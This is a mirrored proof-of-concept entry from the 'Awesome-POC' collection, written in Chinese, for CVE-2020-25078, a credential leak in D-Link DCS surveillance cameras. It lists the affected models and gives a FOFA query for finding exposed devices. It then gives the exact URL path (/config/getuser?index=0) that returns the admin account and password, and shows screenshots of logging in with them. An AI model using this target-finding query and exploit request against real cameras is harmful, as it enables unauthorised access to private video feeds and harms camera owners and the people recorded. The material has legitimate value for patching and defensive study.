admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 20:36:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/network-device/D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078.md

48 lines
823 B
Markdown
Raw Normal View History

update gitbook
2022-02-20 16:14:31 +08:00
# D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078
## 漏洞描述
D-Link DCS系列监控 通过访问特定的URL得到账号密码信息攻击者通过漏洞进入后台可以获取视频监控页面
## 漏洞影响
```
DCS-2530L
DCS-2670L
DCS-4603
DCS-4622
DCS-4701E
DCS-4703E
DCS-4705E
DCS-4802E
DCS-P703
```
## FOFA
```
app="D_Link-DCS-2530L"
```
## 漏洞复现
访问登录页面如下
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162226738.png)
出现漏洞的 Url 为, 其中泄露了账号密码
```plain
http://xxx.xxx.xxx.xxx/config/getuser?index=0
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162227778.png)
使用泄露的账号密码登陆系统
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162227388.png)
Reference in New Issue Copy Permalink